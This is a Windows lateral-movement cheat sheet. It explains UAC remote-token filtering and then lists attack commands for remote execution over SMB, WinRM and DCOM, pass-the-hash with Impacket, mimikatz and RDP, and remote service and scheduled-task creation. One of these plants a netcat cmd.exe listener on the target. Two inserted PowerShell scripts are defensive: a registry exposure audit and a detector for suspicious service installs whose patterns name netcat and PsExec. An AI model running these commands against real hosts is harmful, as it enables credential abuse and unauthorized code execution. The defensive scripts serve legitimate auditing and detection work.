Lateral Movement
Theory
It is not possible to use a local administrator account for lateral movement if all three of the following are set:
EnableLUA = 1
LocalAccountTokenFilterPolicy = 0
FilterAdministratorToken = 1
If FilterAdministratorToken = 0 and the other two values are the same, only the built-in RID 500 local administrator account can be used for lateral movement.
In all other cases any local administrator account can be used for lateral movement.
The values live under the following registry keys:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken
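The decision table above as an audit script (added here, not part of the original notes): it reads the three values from the key listed, falls back to the Windows defaults when a value is absent (EnableLUA=1, LocalAccountTokenFilterPolicy=0, FilterAdministratorToken=0; an assumption that matches the documented defaults), and reports which local administrator accounts would receive a full token over the network. The function names are my own.

```powershell
# Added example, not from the original page. Run as an administrator on the host
# being assessed; nothing here changes the registry, it only reads it.
$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-PolicyValue {
    # Read one DWORD from the policy key; return the supplied default when it is not set.
    param([string]$Name, [int]$Default)
    $item = Get-ItemProperty -Path $policyKey -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $Default }
    return [int]$item.$Name
}

function Get-RemoteLocalAdminExposure {
    # Returns 'None', 'RID500Only' or 'AllLocalAdmins' for the given (or live) values,
    # following the rules in the Theory section above.
    param(
        [int]$EnableLUA = (Get-PolicyValue 'EnableLUA' 1),
        [int]$LocalAccountTokenFilterPolicy = (Get-PolicyValue 'LocalAccountTokenFilterPolicy' 0),
        [int]$FilterAdministratorToken = (Get-PolicyValue 'FilterAdministratorToken' 0)
    )
    if ($EnableLUA -eq 1 -and $LocalAccountTokenFilterPolicy -eq 0) {
        # Remote token filtering is active for local accounts; RID 500 is exempt
        # unless FilterAdministratorToken puts it into Admin Approval Mode too.
        if ($FilterAdministratorToken -eq 1) { return 'None' }
        return 'RID500Only'
    }
    # UAC off, or filtering explicitly disabled: every local admin gets a full token.
    return 'AllLocalAdmins'
}

$exposure = Get-RemoteLocalAdminExposure
[pscustomobject]@{
    EnableLUA                     = Get-PolicyValue 'EnableLUA' 1
    LocalAccountTokenFilterPolicy = Get-PolicyValue 'LocalAccountTokenFilterPolicy' 0
    FilterAdministratorToken      = Get-PolicyValue 'FilterAdministratorToken' 0
    RemoteLocalAdminExposure      = $exposure
} | Format-List

switch ($exposure) {
    'AllLocalAdmins' { Write-Warning 'Set LocalAccountTokenFilterPolicy=0 (and keep EnableLUA=1) to restrict remote local admin tokens.' }
    'RID500Only'     { Write-Warning 'Set FilterAdministratorToken=1, or disable/rename the RID 500 account, to close the remaining path.' }
    'None'           { Write-Host 'Local administrator accounts cannot obtain a full token remotely on this host.' }
}
```

The three values only govern local accounts; a domain account that is a member of the local Administrators group is not affected by LocalAccountTokenFilterPolicy at all, so the script says nothing about that path. Pair the check with unique per-host local admin passwords (LAPS or equivalent) so that a single hash or password cannot be reused across machines even where the exposure is 'RID500Only'.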
Authenticated RCE
SMB
.\psexec64.exe \\<ip> -u .\<administrator> -p <password> [-c <malware.exe>] -s -accepteula
crackmapexec <ip> -u <user> -p <password> -d <domain> -<x|X> <command>
WinRM
From Windows
winrs -r:http://<ip>/wsman "<cmd>"
From Kali
auxiliary/scanner/winrm/winrm_auth_methods
auxiliary/scanner/winrm/winrm_login
auxiliary/scanner/winrm/winrm_cmd
exploit/windows/winrm/winrm_script_exec
DCOM with MMC application through RPC
$COM = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.APPLICATION", "<ip>"))
$COM.Document.ActiveView.ExecuteShellCommand("<C:\Windows\System32\calc.exe>", $Null, $Null, "7")
[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<ip>")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe",$null,"\\<ip>\$
./dcomexec.py <domain>/<user>:<password>@<ip> <cmd>
Pass-The-Hash
If you only have the NT hash, pad the LM half with 32 zeros so the tools accept the lm:nt format:
00000000000000000000000000000000:8845f7eaee8fb117ad06bdd830b7586c
crackmapexec <ip> -u <user> -H "<ntlm>" -x "<msfvenom psh-cmd>"
impacket-wmiexec <user>@<ip> -hashes <lm:nt>
pth-winexe -U <user>%<ntlm> //<ip> "<msfvenom psh-cmd>"
wmic -U <domain/><adminuser>%<password> //<host> "<cmd>"
wmis -U <domain/><adminuser>%<password> //<host> "<cmd>"
python wmiexec.py -hashes :<hash> <user>@<ip>
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm> /run:<cmd>
kiwi_cmd "\"sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm> /run:cmd.exe\""
xfreerdp /u:<user> /d:<domain> /pth:<ntlm> /v:<ip>:3389 /dynamic-resolution
use exploit/windows/smb/psexec
Remote invoke executable
From attacker machine
wmic /node:<targetip> /user:<admin_user> /password:<password> process call create <command>
wmic /node:@<list_targetip.txt> /user:<admin_user> /password:<password> process call create <command>
Option 1
1. Establish SMB session
net use \\<targetip> <password> /u:<domain\username>
2. Create the service, wrapping the command in cmd.exe /k to dodge the 30-second service start timeout
sc \\<targetip> create <service_name> binpath= "cmd.exe /k <command>"
sc \\<targetip> create <service_name> binpath= "cmd.exe /k <c:\tools\nc.exe -L -p <port> -e cmd.exe>"
sc \\<targetip> start <service_name>
Option 2
1. Establish SMB session
net use \\<targetip> <password> /u:<domain\username>
2. Verify that the Schedule service is running and start it if not
sc \\<targetip> query schedule
sc \\<targetip> start schedule
3. Check the current local time on the target machine
net time \\<targetip>
4. Schedule the job
schtasks /create /tn <taskname> /s <targetip> /u <user> /p <password> /sc <frequency> /st <HH:MM:SS> /sd <startdate> /tr <command>
at \\<targetip> <HH:MM> <A/P> <command>
5. Verify the job status
schtasks /query /s <targetip>
at \\<targetip>
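Both options leave a clear trace on the target: Option 1 writes a service-installation event (System log, event ID 7045) whose image path is a shell wrapper rather than a real service binary, and PsExec-style tools do the same with their own transient service. The following detection script is an added example, not part of the original notes; the sample events are constructed for the demo, and the assumption that a live 7045 event exposes ServiceName, ImagePath, ServiceType, StartType and AccountName as Properties[0..4] is mine. Function names are my own.

```powershell
# Added example, not from the original page: flag service installs whose image
# path looks like an interactive shell or a remote-admin wrapper.

# Constructed sample records in the shape the converter below produces.
$sampleEvents = @(
    [pscustomobject]@{ Id = 7045; TimeCreated = '2024-01-01 10:00:00'; ServiceName = 'Spooler';
                       ImagePath = 'C:\Windows\System32\spoolsv.exe'; AccountName = 'LocalSystem' },
    [pscustomobject]@{ Id = 7045; TimeCreated = '2024-01-01 10:05:00'; ServiceName = 'svcupd';
                       ImagePath = 'cmd.exe /k c:\tools\nc.exe -L -p 4444 -e cmd.exe'; AccountName = 'LocalSystem' },
    [pscustomobject]@{ Id = 7045; TimeCreated = '2024-01-01 10:07:00'; ServiceName = 'PSEXESVC';
                       ImagePath = '%SystemRoot%\PSEXESVC.exe'; AccountName = 'LocalSystem' }
)

# Regexes for image paths that are not normal service binaries. Extend to taste.
$suspiciousPatterns = @(
    'cmd\.exe\s+/[kc]',       # shell wrapper (the "30-second dilemma" trick)
    'powershell(\.exe)?\s',   # scripted payload registered as a service
    '\bnc(64)?\.exe\b',       # netcat listener or back-connect
    'PSEXESVC'                # PsExec's transient service
)

function Find-SuspiciousServiceInstall {
    # Return one record per 7045 event whose ImagePath matches a pattern.
    param([object[]]$Events)
    foreach ($e in $Events) {
        if ($e.Id -ne 7045) { continue }
        $rule = $suspiciousPatterns | Where-Object { $e.ImagePath -match $_ } | Select-Object -First 1
        if ($rule) {
            [pscustomobject]@{
                Time = $e.TimeCreated; Service = $e.ServiceName
                ImagePath = $e.ImagePath; Account = $e.AccountName; Rule = $rule
            }
        }
    }
}

function Get-ServiceInstallEvents {
    # Live collection from the System log. Assumption: the standard 7045 layout
    # (Properties: ServiceName, ImagePath, ServiceType, StartType, AccountName).
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Id = $_.Id; TimeCreated = $_.TimeCreated
                ServiceName = $_.Properties[0].Value
                ImagePath   = $_.Properties[1].Value
                AccountName = $_.Properties[4].Value
            }
        }
}

# Demo on the constructed data: expect the 'svcupd' and 'PSEXESVC' rows, not 'Spooler'.
Find-SuspiciousServiceInstall -Events $sampleEvents | Format-Table -AutoSize

# For a real host, replace the sample with live events:
# Find-SuspiciousServiceInstall -Events (Get-ServiceInstallEvents) | Format-Table -AutoSize
```

Option 2 is covered the same way by scheduled-task creation auditing (Security log event 4698, or the Microsoft-Windows-TaskScheduler/Operational log); the interesting fields there are the task's action command and the account that registered it, which can be fed through the same pattern list.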
From compromised machine
\\<share>\<exe>
Target another machine using the credentials of the compromised host.
run schtasksabuse -c "<command1>(,command2)" -t <targetip>